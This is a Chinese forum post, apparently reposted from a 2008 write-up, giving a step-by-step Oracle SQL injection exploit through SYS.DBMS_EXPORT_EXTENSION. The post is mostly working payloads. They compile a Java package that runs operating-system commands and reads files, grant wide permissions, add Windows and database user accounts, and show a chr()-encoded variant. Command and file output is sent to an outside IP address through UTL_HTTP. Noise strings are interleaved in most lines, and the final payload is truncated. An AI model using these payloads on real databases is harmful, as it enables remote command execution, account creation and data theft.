以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
: n/ `, y1 y; v3 d8 K! ?, q4 X8 p+ i
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
) X( {' m6 a+ d% i2 c的形式即可。(用" 'a'|| "是为了让语句返回true值)
, c3 [4 M# P) u% f3 R, z语句有点长,可能要用post提交。 i. z$ n- G2 z! J
以下是各个步骤:
4 {8 ?7 t7 v( K7 p1.创建包 " M' J. o2 i% r$ R5 N6 t
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:1 ~, M; i3 x7 @" A
/xxx.jsp?id=1 and '1'<>'a'||(
) q A; `& N& }. X6 w5 ~& _) Mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
G1 x" j5 i# Vcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(+ K0 @) f' U* U j8 r, V
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}: G7 Q Q+ c1 Z& M4 V
}'''';END;'';END;--','SYS',0,'1',0) from dual ! l6 T L# w6 g: \
)
) W8 E; a# W+ w; X3 h------------------------ # c) \' L" |* [5 i) C0 m
如果url有长度限制,可以把readFile()函数块去掉,即:
% @- L$ m [1 O( w" e/xxx.jsp?id=1 and '1'<>'a'||(
; w. F; Q, Q0 ~. cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* r: ], _4 x8 `: x3 v9 E
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
8 x" E, x5 `: _8 w) n, b( H! Mnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}6 b+ G* a7 C) C4 N
}'''';END;'';END;--','SYS',0,'1',0) from dual
7 u6 F4 x% a5 d4 M* w' @4 ~)
, Q G( k' g. Y5 g同时把后面步骤 提到的 对readFile()的处理语句去掉。
6 ?$ O4 m, K/ k------------------------------
/ [5 k; x: @) v* R8 }2.赋Java权限
' u" o1 j! p' c/ Pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual8 d/ \8 q$ k/ @9 ^0 s5 O+ y
3.创建函数
( K& M8 ^ d0 h. m5 rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 Y0 t, A! |2 X: v6 e( O
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual G- }- O5 z4 M% Y3 p2 r
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& F5 n+ ]6 Y: n* z
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual- o; d2 F8 y9 S& f0 s3 B
4.赋public执行函数的权限 ! P. A+ }, D7 e, ^' e7 @6 S9 o; f
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual6 |$ U" {) e- a5 b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
, O# e9 s/ Z0 @: L) Y4 f5.测试上面的几步是否成功 # @% {. D! q6 z
and '1'<>'11'||(
* _+ m( e& Q1 z7 O2 `7 bselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD' 9 y, ]& W7 L( i- Z+ l$ ]7 i( I
)
" I, ~: r% E8 G- jand '1'<>(
( m8 o/ c; c8 x1 E( N& mselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' * p: X5 w* p6 z1 [7 U
) 2 I Q& K, i4 g Q' A
6.执行命令: " c! r- I2 U! p! v9 B e
/xxx.jsp?id=1 and '1'<>(
9 R! Q" E' u2 w3 ~8 l+ X+ Kselect sys.LinxRunCMD('cmd /c net user linx /add') from dual 5 {1 H2 t8 r/ y7 c, s5 E0 [" Z
5 i3 Q) F' N' h$ l |6 g- t0 i)
7 B% \) V. }0 y5 d3 G5 `/xxx.jsp?id=1 and '1'<>( ( X7 c4 R6 \) ~1 F6 d) N
select sys.LinxReadFile('c:/boot.ini') from dual
% E6 j# W! \' x& O1 C" B& { o" M) L; k& I5 `+ P
)
* r3 A ?3 [4 ^8 r" }4 o! x2 G 1 \6 Q' i5 s. c) h2 a: q
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 , { `% S0 q1 s: e& h o3 v) `
如果要查看运行结果可以用 union :
, j# d9 Q- u; \- H/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual0 V( u1 R# V8 H3 x/ a1 s6 C
或者UTL_HTTP.request(: ; F! b( q4 c9 _$ M* M
/xxx.jsp?id=1 and '1'<>( $ `+ h: i! V7 B
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
& f$ Q5 \ l3 u) 2 O- I1 w8 Q |2 S
/xxx.jsp?id=1 and '1'<>(
/ K/ e A; H' m' H" z' Z5 dSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual. G$ V& x0 o9 Z- g
) ( ^. ]0 u) F' t: ~
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
3 s! n }' g8 \6 p-------------------- & z6 V" d$ Q& p2 l
6.内部变化
& t! z, p' I% ^3 y- C, {通过以下命令可以查看all_objects表达改变: ! @5 o, F. c7 a" H
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'0 a2 P* T* K$ e; j. P: R
7.删除我们创建的函数
5 k5 h/ V0 V2 p7 F7 `select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) h. X. m, p4 f8 Xdrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
; v! P1 h1 g# q& O==================================================== % @6 z$ s0 n% g& N& \9 d/ g6 [3 J
全文结束。谨以此文赠与我的朋友。
; m3 i$ u" C# `linx 7 ]" P2 w# W/ v9 }; F7 B$ o4 l! _
124829445
% l c& y5 c$ ?0 ~: q2 p" e; {2008.1.12 1 u2 G# {& H/ ^! ?' D, M
linyujian@bjfu.edu.cn
# p+ T: M1 S; h# O p- q- b s. g6 r======================================================================
4 `9 r# m8 A7 D& h E测试漏洞的另一方法: / W6 d4 O4 E ?& i1 W
创建oracle帐号:
( M4 I' ^( C9 G/ }9 J* Q/ H+ aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 Q0 [0 J- L6 ?* R, I
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual4 R5 ?6 Z! e7 Q' `1 _
即:
* Q( a4 f i' R* b8 x0 F6 ~) Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
8 `/ F! o) [- _) q zchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual ( x% ~' ]/ r A
确定漏洞存在:
4 U1 J9 \9 [3 b) p: T' z/ B1 o2 |1<>(
O: [5 g0 {" o+ r; ^+ eselect user_id from all_users where username='LINXSQL'
, O: r% Y3 e2 d; k) \)
9 `+ t, u6 C V/ Y给linxsql连接权限:
5 C* L& @3 u* u& {, sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 ?+ \8 e$ e7 Q; xGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
; {& e* u' p$ c( U删除帐号: 2 M Q+ L" N' V( n
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# s( N; X3 l0 I, w& Wdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
; d# ? v+ l" F* |. L* _; _( ]======================
: V8 F% H6 _' h+ M% O# f3 P以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
" j/ t9 m" T9 B I1.jsp?id=1 and '1'<>( - f# [/ G( P6 T, r- a5 m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' Q9 m1 D9 U0 s7 ~; O
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
1 n5 k' @* \- {) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE3 C6 L3 K4 d# L
)
8 B. Y- b' S+ V6 S/ L: ]
, x( S" ^8 U @; n
" I0 ^6 T. v3 {1 q
0 |% k9 K1 n C% J |
发表于 2012-12-18 12:21:48
收藏
支持
反对